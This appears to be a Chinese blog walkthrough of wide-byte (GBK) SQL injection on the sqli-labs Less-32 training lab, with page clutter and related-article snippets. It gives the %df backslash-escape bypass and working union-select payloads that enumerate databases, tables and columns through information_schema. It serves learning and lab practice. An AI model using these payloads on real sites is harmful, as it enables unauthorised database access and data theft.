宽字节注入-sql-lib

最新推荐文章于 2024-04-09 14:58:50 发布
最新推荐文章于 2024-04-09 14:58:50 发布
阅读量468 收藏
点赞数
分类专栏: sql 文章标签: sql-lib 注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43803070/article/details/89918772
版权

**

宽字节注入原理:

**

一、
原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个汉字(前一个 ascii 码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思路是将 ‘ 转换为 \’ 。因此我们在此想办法将 ’ 前面添加的 \ 除掉,一般有两种思路:
1、%df 吃掉 \ 具体的原因是 urlencode(’) = %5c%27,我们在%5c%27 前面添加%df,形成%df%5c%27,而上面提到的 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,此事%df%5c 就是一个汉字,%27 则作为一个单独的符号在外面,同时也就达到了我们的目的。
2、将 \’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 的情况,后面的%5c 会被前面的%5c给注释掉。这也是 bypass 的一种方法
二、
接下来我们进行实战演练:
1.首先我们像往常一样输入参数并加一个‘,看一下是否回显报错。查看源码我们得知:函数为过滤 ‘ \ 的函数,将 ‘ 转为 \’ , 将 \ 转为 \ ,将 “ 转为 \”。
在这里插入图片描述 2.http://127.0.0.1/sqli-labs-master/Less-32/?id=1�’ --+ 看到页面显示正常。
在这里插入图片描述3.http://127.0.0.1/sqli-labs-master/Less-32/?id=1�’ order by 3 --+ order by 4时显示不正常。3时显示正常,证明有三个回显位置。
在这里插入图片描述4.http://127.0.0.1/sqli-labs-master/Less-32/?id=-1�’ union select 1,2,group_concat(schema_name) from information_schema.schemata --+ 爆出所有的数据库 注意在使用union联合查询的时候前面的1要变为-1,而且在爆出数据库的时候要使用group_concat(),因为我们在前面输入‘报错的时候可以看到报错语句后面出现了 limit 0,1.
在这里插入图片描述5.爆出表
在这里插入图片描述http://127.0.0.1/sqli-labs-master/Less-32/?id=-1�’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479--+
但是我们在爆出表的时候遇到了一些问题,我们在选择数据库的时候用的语句是table_schema=’'seurity",显而易见本关已经过滤掉了“”所以我们用“”没有用,因此在这里我们可以将我们选择的数据库转换成十六进制的形式。进而绕过过滤函数。同时我们也可以将数据库的名字转变成database()。
6.爆出字段
http://127.0.0.1/sqli-labs-master/Less-32/?id=-1�’ union select 1,2,group_concat(column_name) from information_schema.columns where table_name=0x7573657273--+

在这里插入图片描述7.爆出字段
在这里插入图片描述至此,sql-lib32关到此结束。
(编码工具推荐小葵编码工具)

暮秋初九
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql-lib 闯关课程第一课
tmgt的博客
04-25 3001
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,我的这个系列主要是分享与总结我得心得,下面开始吧 sql-libs下载地址 链接: sql-libs下载地址. less1 我采用的环境是phpstudy集成环境,网上的教程很多,可以自行寻找搭建。我搭建的环境是php5.2.17+Apache2.4.39+Mysql8.0环境,在php5.2环境中mag...
宽字节SQL注入
SheXinK’s Blog
12-19 184
宽字节SQL注入1、 SQL注入介绍2、 宽字节注入PHP代码3、 宽字节注入测试4、 代码漏洞修复 1、 SQL注入介绍   SQL注入介绍:SQL注入介绍   注入产生原因:web应用程序对用户输入数据的合法性没有判断或过滤不严,导致恶意payload直接带入SQL语句执行,从而执行payload中非法操作! 2、 宽字节注入PHP代码   新建PHP文件,将下面代码复制到PHP文件中,在浏览...
渗透学习-SQL注入篇-靶场篇-Sql-lib详细的解决过程(1-65关的个人解决思路 2022.6.8 )
qq_43696276的博客
05-04 5027
在经过上一篇的sql基础学习后,以下将正式进入靶场的学习与训练当中。本文以下将进行对sql-libs靶场的学习,1-65关全攻略。
sql注入宽字节注入
最新发布
weixin_45653478的博客
04-09 577
如果数据库设置宽字节字 符集 gbk 会导致宽字节注入,从而逃逸 gpc 前提条件 简单理解:数据库编码与 PHP 编码设置为不同的两个编码那么就有可能产生宽字 节注入 深入讲解:要有宽字节注入漏洞,首先要满足数据库后端使用双/多字节解析 SQL 语句,其次还要保证在该种字符集范围中包含低字节位是 0x5C(01011100) 的字 符,初步的测试结果 Big5 和 GBK 字符集都是有的, UTF-8 和 GB2312 没 有这种字符(也就不存在宽字节注入)。
sqlmap基础(sql-lib过关)
rnn0921的博客
08-01 544
从十一关开始,注入位置会发生变化,之前都是从GET的URL部分注入的,现在这里是从POST请求中的Payload进行注入的,因此我们的命令也相应发生了变化,需要使用--data来定义payload的内容。id2=hashlib.md5(id).hexdigest()")--drop-set-cookie 扔掉response中的set-cookie头。--keep-alive 建立长久的HTTP(S)连接 (与--proxy不兼容)--predict-output 预测输出(与--threads不兼容)
sql-lib 搭建&31-40关
weixin_51387754的博客
10-19 740
sql-libs是github上的一个专注于sql注入的平台,目前网上关于这个平台的资源很多,分享与总结做题情况。
SQLlib-第32关之宽字节注入
千寻的博客
02-22 1299
文章目录宽字节注入第一节 构造绕过代码第二节注入原理第三节代码审计第四节注入实操判断字段个数判断显示位置判断数据库版本何当前数据库名数据库中的表名表中字段字段内容免责声明 宽字节注入 宽字节注入准确来说不是注入手法,而是另外一种比较特殊的情况。 为了说明宽字节注入问题,我们以SQLi-labs 32 关为例子。 第一节 构造绕过代码 [http://192.168.139.136/sqli-lab...
SQL宽字节注入
qq_64332865的博客
02-19 3340
宽字节注入适用于cms和数据库对字符串的编码方式不统一、WAF利用 AddSlashes()等函数对敏感字符进行转义的场景。 统一的国际规范的理想状态是所有应用程序都使用Unicode编码,所有的网站 都使用UTF-8编码。但因为一些历史原因,国内及国外(特别是非英语国家)的一些cms仍然使用着自己国家的一套编码(如GBK);也有一些cms为了考 虑老用户,出了GBK和 UTF-8两个版本。 一个GBK编码汉字,占用2个字节;一个UTF-8编码的汉字,占用3-4个字节。当Web应用程序的编码方式为GBK,而
CodeQL 闭源应用创建数据库 & SQL注入1
08-03
在Mybatis中,可以使用预编译语句(PreparedStatement)来避免SQL注入,确保输入数据不会被解释为SQL命令的一部分。例如,将动态SQL语句与参数分开,如下所示: ```xml SELECT * FROM users WHERE id = #{id} ``...
SSH-lib.zip_ssh lib_ssh lib spring_ssh.jar.包
09-24
SSH-lib.zip是一个包含SSH库和相关依赖的Java项目开发资源包。SSH在这里指的是Spring、Struts和Hibernate,这是一个常见的Java企业级应用开发框架组合。这个压缩包提供了完整的SSH框架集成,便于开发者快速构建基于...
jChat-1.3.apk.zip
08-17
此外,防止SQL注入和XSS攻击也是开发过程中的重要环节。 9. **性能优化**:为了提供流畅的用户体验,开发者需关注内存管理、UI渲染、资源加载等方面。例如,使用ProGuard或R8进行代码混淆,减少APK大小;使用...
sql_lib.zip
05-03
Flink SQL Client操作kafka、es、mysql时所需的jar文件,下载后放在flink目录下,在启动Flink SQL Client时通过-l参数指定
我的作品2018-2019
03-24
【MyBatis】:MyBatis是一个持久层框架,它简化了数据库操作,将SQL语句与Java代码紧密结合起来,使得开发者可以更方便地进行数据查询、更新和删除等操作。在本项目中,MyBatis可能被用来实现后端与MySQL数据库之间...
findsecbugs-cli-1.11.0.zip
11-12
它提供了丰富的安全检测规则,覆盖了诸如SQL注入、跨站脚本(XSS)、权限泄露等常见攻击类型。通过集成FindSecBugs,开发者可以在编码阶段就对代码进行安全审计,避免在后期修复这些安全问题时带来的成本和风险。 ...
sql-lib靶场搭建-windows操作系统
liguangyao213的博客
01-26 3127
下载phpstudy,下载地址:Windows版phpstudy下载 - 小皮面板(phpstudy) 下载完成,解压后文件目录如下:: 双击exe文件进行快速安装即可进行安装: 安装完成后双击图标,面板显示为下图: 到此phpstudy安装完成,下一步进行sql-lib靶场下载,下载地址:https://github.com/Audi-1/sqli-labs 下载完成后将解压文复制到phpstudy的WWW目录下,默认安装情况下phpstudy的目录路径为C:\php..
sql-lib 1-10关
鸣蜩十四的博客
06-14 645
1. 字符型 http://127.0.0.1:88/sql/Less-1/?id=1' order by 4%23失败 http://127.0.0.1:88/sql/Less-1/?id=1' order by 3%23成功 http://127.0.0.1:88/sql/Less-1/?id=-1' union select 1,database(),group_concat(schema_name) from information_schema.schemata%23 查看所有数据库 ht...
Sqli-libs通关详解__第一关
henghengzhao_的博客
10-04 868
sqli-libs通关详解,第一关通关详解
sql注入 sql-lib第一个(回显注入
weixin_74182283的博客
03-28 991
SQL注入攻击的根源:程序命令和用户数据(即用户输入) 之间没有做到泾渭分明 注入成功的基础 1、相信用户输入的数据 2、Sql语句的拼接按照注入的网页功能类型分类 •(ps:注入类型纯看个人收集情况)1、登录注入 • 2、cms注入 •按照注入点值的属性分类 • 1、数值型 • 2、字符串型 •基于从服务器返回的内容 • 1、有回显 • 2、无回显 •按照注入的程度和顺序 • 1、一阶注入 • 2、二阶注入 •。
sqlilabs通关()
Forrest_bear的博客
05-24 1029
就像以下代码一样:隔离空格。
sql-labs宽字节注入
07-28
宽字节注入中,攻击者通过在输入的数据中插入特殊编码的宽字节字符,绕过了数据库的输入过滤和检查,成功执行恶意的 SQL 语句。这种攻击技术主要针对使用双字节字符集编码(如 GBK、Big5 等)的数据库。 SQL-Labs...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值